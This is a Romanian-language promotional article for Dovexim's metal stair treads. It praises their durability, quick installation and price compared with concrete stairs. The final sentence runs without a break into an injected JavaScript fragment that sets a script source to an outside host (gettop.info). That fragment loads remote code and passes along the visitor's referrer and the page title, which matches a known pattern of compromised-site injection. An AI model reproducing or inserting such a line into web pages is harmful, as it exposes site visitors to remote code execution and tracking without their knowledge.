Trepte-metalice-kFZ6ZExista o serie de avantaje pentru care este preferabila utilizarea unor trepte metalice in detrimentul celor din beton printre aceste numarandu-se faptul ca sunt extrem de usor de montat, nu necesita complicatii cu intretinerea si rezista mult mai bine in timp, la uzura. In plus, se potrivesc in multe situatii si sunt un real ajutor celor care doresc o instalare rapida a treptelor de acces.

Avand o experienta de peste 15 ani in domeniul confectiilor metalice, firma Dovexim produce si comercializeaza o gama variata de produse metalice, de calitate premium, folosind exclusiv materiale abilitate, conforme cu normele si standardele industriale aflate in vigoare.

Care sunt avantajele utilizarii unor trepte metalice de la Dovexim?

Aceste trepte metalice prezinta marele avantaj al rezistentei, un fapt extrem de folositor in decizia de amplasare a unor astfel de trepte in diverse incaperi sau spatii industriale . Duritatea materialelor din care sunt fabricate le ajuta sa faca fata cu brio chiar si in zonele extreme , avand o durata de functionare mare.

Comparativ cu scarile din beton, confectiile metalice sau treptele metalice nu se deteriorizeaza atat de repede chiar daca sunt supuse la greutati mari sau la actiunea unor factori chimici mai mult sau mai putin periculosi.

Alegerea unor trepte metalice este este cea mai buna optiune deoarece se monteaza foarte usor si nu necesita mult timp pana sunt in stare de functionare. Treptele metalice sunt usor de asamblat, nefiind necesara o intrerupere in activitatea clientului pentru ca treptele sa fie gata de utilizare. O data montate, puteti sa va bucurati de facilitatile acestor trepte metalice. In cazul in care spatiile unde sunt amplasate sunt vitrege cu atat materialul de fabricatie al treptelor metalice trebuie sa fie mai rezistent.

Aspectul financiar nu trebuie neglijat deoarece sunt foarte avantajoase ca si pret iar recuperarea unei asemenea investitii poate fi facuta intr-un timp foarte scurt.

Dovexim va ofera trepte metalice de cea mai buna calitate!

Echipa de specialisti Dovexim vine in ajutorul tuturor clientilor sai cu cele mai bune solutii pentru spatiile industriale unde acestia isi desfasoara activitatea. Toate produsele pot fi personalizate in functie de nevoile clientilor precum si de mediul in care urmeaza a fi montate. Rezistenta si constructia stabila a acestor trepte metalice  fac din Dovexim un partener de incredere si un frunizor de produse de calitate superioara.

Treptele metalice pot fi confectionate din mai multe materiale cum ar fi din gratare SP si P, scari metalice zincate termic sau eletcrolit, cu material antiderapant sau derapant.

Toate produsele sunt realizate astfel incat sa respecte intru totul standardele de calitate iar raportul calitate-pret este unul exceptional. Toate materialele respecta conventiile internationale in domeniul securitatii asadar orice risc este eliminat. Rezistenta si siguranta garantata,consiliere specializata, orientare catre client, montaj perfect si profesionalism este ceea ce caracterizeaza firma Dovexim.

Pentru mai multe informatii despre aceste trepte metalice dar si alte produse din categoria gratarelor metalice puteti accesa pagina de internet a companiei Dovexim. Aic veti gasi o serie de produse cu descrieri complete precum si datele de contact unde puteti comanda cu incredere produsele marca Dovexim.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;